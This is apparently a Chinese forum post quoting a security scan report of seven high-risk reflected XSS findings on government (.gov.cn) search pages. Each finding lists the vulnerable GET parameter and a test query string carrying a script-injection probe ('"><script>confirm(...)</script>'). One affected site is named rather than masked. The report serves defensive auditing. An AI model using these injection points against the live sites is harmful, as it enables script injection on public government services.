网监检测的漏洞,看不明白是什么意思:
7.6. XSS(7)
风险等级 | URL | 请求 | 参数 |
高危 | http://www.*.gov.cn/e/search/ | GET | sort |
高危 | http://www.*.gov.cn/e/search/ | GET | thedate_min |
高危 | http://www.*.gov.cn/e/search/ | GET | pagesize |
高危 | http://www.*.gov.cn/e/search/ | GET | thedate_max |
高危 | http://www.*.gov.cn/e/search/ | GET | order |
高危 | http://www.smxhb.gov.cn/index.aspx | GET | id |
高危 | http://www.*.gov.cn/e/search/ | GET | siteid |
高危 http://www.*.gov.cn/e/search/
请求 | GET |
类型 | None |
位置 | URI |
参数 | thedate_min |
测试数据 | sort=1&thedate_max=1&pagesize=20&title=1&thedate_min="><script>confirm(5486)</script>&siteid=1&order=1&modelid=49 |
高危 http://www.*.gov.cn/e/search/
请求 | GET |
类型 | None |
位置 | URI |
参数 | pagesize |
测试数据 | sort=1&thedate_max=1&pagesize="><script>confirm(5646)</script>&title=1&thedate_min=1&siteid=1&order=1&modelid=49 |
高危 http://www.*.gov.cn/e/search/
请求 | GET |
类型 | None |
位置 | URI |
参数 | thedate_max |
测试数据 | sort=1&thedate_max="><script>confirm(0365)</script>&pagesize=20&title=1&thedate_min=1&siteid=1&order=1&modelid=49 |
高危 http://www.*.gov.cn/e/search/
请求 | GET |
类型 | None |
位置 | URI |
参数 | order |
测试数据 | sort=1&thedate_max=1&pagesize=20&title=1&thedate_min=1&siteid=1&order="><script>confirm(5246)</script>&modelid=49 |
高危 http://www.*.gov.cn/index.aspx
请求 | GET |
类型 | None |
位置 | URI |
参数 | id |
测试数据 | sublanmuid=153&id="><script>confirm(7397)</script>&lanmuid=46 |
高危 http://www.*.gov.cn/e/search/
请求 | GET |
类型 | None |
位置 | URI |
参数 | siteid |
测试数据 | sort=1&thedate_max=1&pagesize=20&title=1&thedate_min=1&siteid="><script>confirm(4519)</script>&order=1&modelid=49 |
